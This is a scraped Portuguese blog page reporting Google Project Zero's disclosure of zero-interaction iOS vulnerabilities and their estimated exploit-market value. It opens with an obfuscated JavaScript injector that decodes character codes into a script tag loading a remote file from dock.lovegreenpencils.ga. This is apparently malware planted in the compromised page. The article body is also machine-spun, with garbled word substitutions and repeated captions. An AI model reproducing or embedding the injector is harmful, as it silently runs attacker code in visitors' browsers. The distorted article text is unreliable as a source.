Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,100,111,99,107,46,108,111,118,101,103,114,101,101,110,112,101,110,99,105,108,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); Google divulga vulnerabilidades no iOS que poderiam valer mais de US$20 milhões no mercado de exploits - Carlos Tutoriais
Google divulga vulnerabilidades no iOS que poderiam valer mais de US$20 milhões no mercado de exploits

Google divulga vulnerabilidades no iOS que poderiam valer mais de US$20 milhões no mercado de exploits

Embora todas as seis falhas de segurança tenham sido corrigidas na semana passada, em 22 de julho, com a versão iOS 12.4 da Apple, os detalhes sobre uma das vulnerabilidades foi mantido em sigilo porque o patch iOS 12.4 da Apple não resolveu completamente o bug, de combinação com Natalie Silvanovich, uma das duas pesquisadoras do Project Zero da Google que encontraram e reportaram os bugs.

Segundo a pesquisadora, quatro dos seis bugs de segurança poderiam levar à realização de códigos maliciosos em um dispositivo iOS remoto, sem premência de interação com o usuário.

Bugs e vulnerabilidade de segurança atingiram o iOS e é bom o usuário atualizar seu sistema pois ele pode ser controlado sem o usuário saberBugs e vulnerabilidade de segurança atingiram o iOS e é bom o usuário atualizar seu sistema pois ele pode ser controlado sem o usuário saber

Tudo o que um invasor precisa fazer era enviar uma mensagem malformada para o smartphone da vítima, e o código malicioso seria executado mal o usuário abrisse e visualizasse o item recebido.

Os quatro erros são CVE-2019-8641 (detalhes mantidos em sigilo), CVE-2019-8647 , CVE-2019-8660 e CVE-2019-8662. Os relatórios de bugs vinculados contêm detalhes técnicos sobre cada bug, mas também um código de prova de noção que pode ser usado para fabricar exploits.

O quinto e o sexto bugs, CVE-2019-8624 e CVE-2019-8646, permitiam que um invasor vazasse dados da memória de um dispositivo e lesse os arquivos de um dispositivo remoto – também sem a interação do usuário.

Embora seja sempre uma boa teoria instalar atualizações de segurança mal elas estiverem disponíveis, a disponibilidade do código de prova de noção significa que os usuários devem instalar a versão iOS 12.4 o quanto antes.

 Os bugs foram descobertos por Natalie Silvanovich e por Samuel Groß, pesquisador de segurança do Project Zero da Google.

Conferência acontece no início deste mêsConferência acontece no início deste mês

 

Silvanovich fará uma apresentação sobre as vulnerabilidades remotas e sem interação do iPhone na conferência de segurança Black Hat que será realizada em Las Vegas na próxima semana.

“Houve rumores de vulnerabilidades remotas que não exigem interação do usuário para guerrear o iPhone, mas informações limitadas estão disponíveis sobre os aspectos técnicos desses ataques em dispositivos modernos”, diz um resumo da palestra de Silvanovich .

A palestra de Silvanovich deve atrair muita atenção na próxima semana.

“Esta apresentação explora a superfície de ataque remota sem interação do iOS. Ele discute o potencial de vulnerabilidades em SMS, MMS, Correio de Voz Visual, iMessage e Mail, e explica porquê configurar ferramentas para testar esses componentes. Também inclui dois exemplos de vulnerabilidades descobertas usando esses métodos.”

Até hoje, os bugs do iOS sem interação do usuário eram normalmente encontrados no arsenal de fornecedores de exploits e fabricantes de ferramentas legais de interceptação e software de vigilância.

Tais vulnerabilidades são o santo graal de qualquer invasor, permitindo que eles invadam dispositivos das vítimas sem serem detectados.

Quando vendidos no mercado de exploits, vulnerabilidades porquê essas poderiam trazer um “bug hunter” supra de US$1 milhão, de combinação com um gráfico de preços publicado pela Zerodium.

Você sabia que existe uma tabela de preços para tais descobertas?Você sabia que existe uma tábua de preços para tais descobertas?

Não seria um excesso proferir que Silvanovich acaba de publicar detalhes sobre exploits que valem entre US$5 milhões e US$10 milhões.

Outro fornecedor de exploits, o Crowdfense, disse que, considerando a prisão de ataques sem interação e o roupa de as vulnerabilidades funcionarem em versões recentes de iOS, estas poderiam ser facilmente avaliadas entre US$ 2 milhões e US$ 4 milhões cada, elevando seu valor para mais de US$20 milhões.

Feito por Carlos tutoriais, quentinho, fresquinho para você.

Deixe uma resposta

Your email address will not be published.

x

Veja também

A RX 590 PowerColor Red Dragon boa para jogos?

A RX 590 PowerColor Red Dragon boa para jogos?

Basicamente continuando o nosso primeiro Roda Liso que foi feito com a RX 580 l em Maio desse ano, trouxemos em parceria com aTerabyteShopa RX 590 Powercolor Red Dragon, a ...